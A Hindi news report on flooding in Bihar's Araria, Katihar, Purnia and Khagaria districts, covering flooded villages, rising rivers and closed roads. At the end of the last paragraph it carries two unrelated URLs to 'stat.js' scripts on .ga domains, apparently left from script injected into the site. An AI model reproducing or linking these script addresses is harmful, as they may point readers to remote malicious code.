बिहार में मौसम विभाग ने कुछ दिन पहले ही प्रदेश भर में भारी बारिश को लेकर अलर्ट जारी कर दिया था और अब बिहार के विभिन्न क्षेत्रों में 1 सप्ताह से लगातार बारिश हो रही थी जिसके कारण कोसी, सीमांचल व पूर्व बिहार में बाढ़ की स्थिति बन गई है| आपको बता दें, अररिया जिले की 5 दर्जन पंचायतों के डेढ़ सौ गांव में बाढ़ का पानी घुस चुका है, जिसके कारण गांव वाले काफी प्रभावित हो रहे हैं, हालत काफी बिगड़ गई है|

 

 

कटिहार में तो बाढ़ के कारण नदियां खतरे के निशान से ऊपर बह रही है| जीरोमाइल के पास पानी का दबाव बढ़ने के कारण बंद पुल पर मंगलवार से वाहनों के परिचालन शुरू होने की संभावना जताई जा रही है। कई क्षेत्रों में तो सड़कों के कटने से आवागमन बंद हो गया है। खबरों के मुताबिक, फारबिसगंज-कुर्साकांटा मार्ग व जोकीहाट में सड़कों के कटने से आवागमन काफी प्रभावित हो गया है| कुर्साकांटा के कोतहपुर व डहुआबाड़ी में एप्रोच कट गया।

 

 

पूर्णिया में बायसी की 17 पंचायतों में बाढ़ का पानी प्रवेश कर गया है। महानंदा के उफानाने से बारसोई, कदवा, डंडखोरा, प्राणपुर और अमदाबाद प्रखंड की पांच दर्जन पंचायतों की करीब 5.50 लाख लोग प्रभावित है। 350 से अधिक गांवों में बाढ़ जैसे हालात बने हुएहैं। कदवा प्रखंड के शिवगंज डायवर्सन के समीप 3 फीट पानी बहने के कारण सोनैली-पूर्णिया में यातायात व्यवस्था ठप है। खगड़िया में सभी नदियों के जलस्तर में वृद्धि होने से करीब दो दर्जन गांवों पर बाढ़ का खतरा मंडराने लगा है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.